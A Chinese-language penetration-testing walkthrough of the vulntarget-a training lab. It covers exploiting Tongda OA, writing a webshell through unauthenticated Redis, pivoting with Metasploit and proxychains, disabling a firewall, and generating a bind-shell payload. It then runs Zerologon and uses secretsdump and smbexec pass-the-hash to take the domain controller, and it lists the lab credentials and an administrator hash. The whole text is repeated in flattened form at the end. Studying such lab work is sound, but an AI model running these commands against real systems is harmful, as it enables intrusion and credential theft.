渗透靶场——vulntarget-a综合靶场
字数 1621 2025-08-24 16:48:15

Vulntarget-A 综合靶场渗透教学文档

靶场环境概述

  • Win7系统:

    • 密码: admin
    • 设置通达OA漏洞
    • 入站规则开放80端口
    • 存在永恒之蓝漏洞
    • 网络配置: 动态外网IP(NAT模式), 静态内网IP

  • Win2016系统:

    • 账号: vulntarget\win2016
    • 密码: Admin#123
    • 管理员(administrator)密码: Admin@123
    • 已安装Redis(自启), Web环境(自启)
    • 入站规则开放80端口
    • 双静态内网IP

  • Win2019系统(域控):

    • 密码: Admin@666
    • 已安装: AD域、vmtools
    • 已添加域成员
    • 计算机名: win2019
    • 静态IP设置

渗透测试流程

1. 外网打点

  1. 扫描发现目标:

    • 使用Kali扫描同网段IP
    • 发现靶机外网地址: 192.168.135.152

  2. 端口扫描:

    • 使用kscan扫描发现开放80端口
    • 识别为通达OA系统

  3. 利用通达OA漏洞:

    • 使用工具获取cookie直接攻击
    • 通过蚁剑连接获取shell
    • 确认获得system权限

2. 内网信息收集

  1. 网络配置检查:

    • 发现双网卡配置
    • 内网网段: 192.168.135.x 和 10.0.20.x

  2. 使用fscan扫描内网:

    • 发现永恒之蓝漏洞(MS17-010)

  3. 获取系统哈希:

    • 利用hashdump获取当前用户hash
    • 收集密码对内网其他主机进行密码喷洒攻击

3. 内网横向移动

  1. 建立路由:

    • 使用MSF添加路由与10.0.20.x网段通信
    route add 10.0.20.0 255.255.255.0 1

  2. 设置代理:

    • 使用MSF建立socks代理
    use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
run

  3. 内网主机发现:

    • 使用MSF的arp_scanner模块
    use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.1-254
run
    • 发现目标IP: 10.0.20.99

  4. 端口扫描:

    • 使用proxychains配合nmap扫描
    proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080
    • 发现开放80和6379(Redis)端口

  5. Redis未授权访问利用:

    • 连接Redis服务
    proxychains redis-cli -h 10.0.20.99
    • 写入一句话木马
    • 使用蚁剑连接(需在Kali中运行蚁剑并配置代理)

4. 域渗透

  1. 获取内网主机权限:

    • 关闭目标防火墙
    netsh firewall set opmode mode=disable
    • 生成正向连接payload
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f exe > shell.exe

  2. 域内主机发现:

    • 发现域控IP: 10.0.10.110

  3. 利用Zerologon漏洞(CVE-2020-1472):

    • 准备impacket工具
    git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install -r requirements.txt
python3 -m pip install .
    • 下载并执行漏洞利用脚本
    git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
    • 成功将域控密码置空

  4. 获取域管hash:

    • 使用impacket的secretsdump
    proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass
    • 获取到域管administrator的hash:
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

  5. 横向移动:

    • 使用impacket的smbexec进行横向移动
    proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

关键知识点总结

  1. 永恒之蓝利用:

    • MSF模块: exploit/windows/smb/ms17_010_eternalblue
    • 设置正确的rhost和lhost参数

  2. 内网代理配置:

    • 使用MSF的socks_proxy模块
    • 配合proxychains进行工具代理

  3. Redis未授权访问:

    • 直接连接redis-cli
    • 写入webshell进行控制

  4. Zerologon漏洞利用:

    • 影响Windows Server 2008 R2至2019版本
    • 可将域控密码置空
    • 需配合impacket工具进行后续利用

  5. 横向移动技巧:

    • 使用hash进行认证(pass-the-hash)
    • impacket工具包中的smbexec、secretsdump等模块

注意事项

  1. 代理使用:

    • proxychains仅对TCP流量有效
    • UDP和ICMP流量无法代理转发
    • 使用nmap时需添加-sT参数进行全连接扫描

  2. 内网主机连接:

    • 内网主机通常不出网,需使用正向连接
    • 需关闭目标防火墙或放行相应端口

  3. 工具准备:

    • Kali中安装蚁剑需下载Linux版本
    • impacket工具需提前安装依赖

  4. 漏洞利用顺序:

    • 从外到内逐步渗透
    • 先获取立足点,再收集信息,最后横向移动

通过本靶场的练习,可以全面掌握从外网打点到内网横向移动的完整渗透流程,特别是域环境的渗透技巧。

Vulntarget-A 综合靶场渗透教学文档 靶场环境概述 Win7系统 : 密码: admin 设置通达OA漏洞 入站规则开放80端口 存在永恒之蓝漏洞 网络配置: 动态外网IP(NAT模式), 静态内网IP Win2016系统 : 账号: vulntarget\win2016 密码: Admin#123 管理员(administrator)密码: Admin@123 已安装Redis(自启), Web环境(自启) 入站规则开放80端口 双静态内网IP Win2019系统(域控) : 密码: Admin@666 已安装: AD域、vmtools 已添加域成员 计算机名: win2019 静态IP设置 渗透测试流程 1. 外网打点 扫描发现目标 : 使用Kali扫描同网段IP 发现靶机外网地址: 192.168.135.152 端口扫描 : 使用kscan扫描发现开放80端口 识别为通达OA系统 利用通达OA漏洞 : 使用工具获取cookie直接攻击 通过蚁剑连接获取shell 确认获得system权限 2. 内网信息收集 网络配置检查 : 发现双网卡配置 内网网段: 192.168.135.x 和 10.0.20.x 使用fscan扫描内网 : 发现永恒之蓝漏洞(MS17-010) 获取系统哈希 : 利用hashdump获取当前用户hash 收集密码对内网其他主机进行密码喷洒攻击 3. 内网横向移动 建立路由 : 使用MSF添加路由与10.0.20.x网段通信 设置代理 : 使用MSF建立socks代理 内网主机发现 : 使用MSF的arp_ scanner模块 发现目标IP: 10.0.20.99 端口扫描 : 使用proxychains配合nmap扫描 发现开放80和6379(Redis)端口 Redis未授权访问利用 : 连接Redis服务 写入一句话木马 使用蚁剑连接(需在Kali中运行蚁剑并配置代理) 4. 域渗透 获取内网主机权限 : 关闭目标防火墙 生成正向连接payload 域内主机发现 : 发现域控IP: 10.0.10.110 利用Zerologon漏洞(CVE-2020-1472) : 准备impacket工具 下载并执行漏洞利用脚本 成功将域控密码置空 获取域管hash : 使用impacket的secretsdump 获取到域管administrator的hash: 横向移动 : 使用impacket的smbexec进行横向移动 关键知识点总结 永恒之蓝利用 : MSF模块: exploit/windows/smb/ms17_ 010_ eternalblue 设置正确的rhost和lhost参数 内网代理配置 : 使用MSF的socks_ proxy模块 配合proxychains进行工具代理 Redis未授权访问 : 直接连接redis-cli 写入webshell进行控制 Zerologon漏洞利用 : 影响Windows Server 2008 R2至2019版本 可将域控密码置空 需配合impacket工具进行后续利用 横向移动技巧 : 使用hash进行认证(pass-the-hash) impacket工具包中的smbexec、secretsdump等模块 注意事项 代理使用 : proxychains仅对TCP流量有效 UDP和ICMP流量无法代理转发 使用nmap时需添加-sT参数进行全连接扫描 内网主机连接 : 内网主机通常不出网,需使用正向连接 需关闭目标防火墙或放行相应端口 工具准备 : Kali中安装蚁剑需下载Linux版本 impacket工具需提前安装依赖 漏洞利用顺序 : 从外到内逐步渗透 先获取立足点,再收集信息,最后横向移动 通过本靶场的练习,可以全面掌握从外网打点到内网横向移动的完整渗透流程,特别是域环境的渗透技巧。